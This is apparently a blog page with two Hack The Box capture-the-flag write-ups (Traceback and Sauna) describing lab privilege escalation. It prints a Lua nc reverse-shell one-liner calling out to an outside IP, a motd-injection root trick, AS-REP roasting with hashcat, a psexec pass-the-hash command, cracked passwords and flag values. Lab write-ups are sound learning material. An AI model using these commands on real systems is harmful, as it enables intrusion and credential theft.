Hack the Box - Traceback Writeup

System Summary


Initial Enumeration

The nmap scan reveals only SSH and HTTP


The main web page shows a simple web page:

Looking in the Github repos of the box creator (https://github.com/Xh4H/Web-Shells) we can see a webshell collection.
Trying their names against the Traceback machine we can see there is one running:


Initial FootHold

Using admin:admin we can get access to a panel where we can upload files, list contents of directories etc...



Our first objective is to upload a php reverse shell (there are many on the internet) and get a shell:




We're in as user webadmin.
Next step is to enumerate other users

User Flag

There is another user named sysadmin:

There is a note file in the webadmin home:

LUA is a scripting language.
It seems also that user webadmin can run luvit (lua interpreter) as user sysdamin via sudo  (no Password)

The obvious step here is to create a script like /tmp/nik.lua


1
os.execute("rm /tmp/nik;mkfifo /tmp/nik;cat /tmp/nik|/bin/sh -i 2>&1|nc 10.10.16.78 5555 >/tmp/nik")

and run it as

1
sudo -u sysadmin /home/sysadmin/luvit /tmp/nik.lua


And get a shell as sysadmin

Root Flag

As sysadmin thhe next step is enumeration with tools like LinEnum or similar.
But it seems that there is nothing interesting
Looking with pspy to see running processes we can see that there is a recurrent task:

There is a process (running as root) that copies files from /var/backups/.update-motd.d/ to /etc/update-motd.d every 1 minute.
Interesting... looks something that cleans corrupted files..

Infact user sysdamin can modify all files in /etc/

The interesting thing is that sshd will run this file as root to show the MOTD and additional messages to all ssh session created.

So we can modify one the files above to run command as root and gain access, but we have to be fast because in one minute the file will be cleaned up.
The sequence of operation to do is:

  • Add our public ssh key to /home/sysadmin/.ssh/authorized_keys (so we can get access and also upload our key for further use)

  • Run  the command echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header adding our code to be executed at next ssh session

  • Logon as sysadmin by ssh (we should be able to do this as we added the key). This operation should result in execution of  cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys

  • Logon as root (the previous command should have added our key to root authorized keys) 


By - No comments:
Labels:

Hack The Box - Sauna Writeup

Machine summary


Enumeration phase

Since it's a windows box I first run enum4linux with no arguments and the only information I got was the domain name: EGOTISTICALBANK

Scanning with nmap for open ports:

We can see that LDAP port is open, which means that is should be a domain controller.
BUt there is also port 80 open so it's worth taking a look at the web page:
NOthing useful here, maybe a couple of from in "Apply now" and "contact Us"
Maybe the team page can help:

Initial Foothold and User escalation 


I compiled a few combination of users like

  • s.driver
  • sdriver
  • sophie.driver
  • h.bear
  • ...
Then I used kerbrute tool to enumerate user using the created user list 



It looks like user fsmith exists

Now I used impacket GetNPUser to get information of user fsmith, if he doesn't have Kerberos preauth:

Saving the hash in a file like hash.txt and running hashcat:
 hashcat  -m 18200 --force hash.txt  rockyou.txt
It will find that password is Thestrokes23 in a few seconds:


So now we have a valid user and password confirmed by smbclient:

With this account we can run evil-winrm or any other winrm script and get access to the system a fsmith:

User fsmith also has the user flag on its desktop: 1b5520b98d97cf17f24122a55baf70cf

The next step is to enumerate users, groups and privileges on the AD

Further enumeration

Maybe some of the steps below are not needed but I wanted to get a good knowledge of the system before acting...

Now we can see that there is also a service user svc_loanmgr

I can upload Sharpound.ps1 and run it:

And the copy the result locally to analyze with Bloodhound


Below some maps by Bloodhound:



With rpcclient we can see that there are some users:

There are only standard groups:

Anbd the three non standard users (fsmith, hsmith, svc_loanmgr) are part of "domain users" groups

We can get the SIDs of these users:

Uploading Winpeas.exe we can get some possible points of escalation:
- No AV installed
- appcmd.exe is installed
- User can create folder in c:\
- LAPS not installed
- Credentialguard not enabled
- LSA Protection not enabled

Using the reg query comamnd to get default username and password settings:

We can connect

  • username: svc_loanmanager
  • password: Moneymakestheworldgoround!

He has some more privileges than a standard user:

Root escalation

With the user svc_loanmgr we can dump secrets with impacket:

once we have the NTLM hash of administrator it's easy to run psexec from impacket using 

python3 ../../impacket-master/examples/psexec.py  -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff "EGOTISTICALBANK/administrator@10.10.10.175"

and we can get a shell as administrator:

Root flag is: f3ee04965c68257382e31502cc5e881f

By - No comments:
Labels:
Subscribe to: Posts (Atom)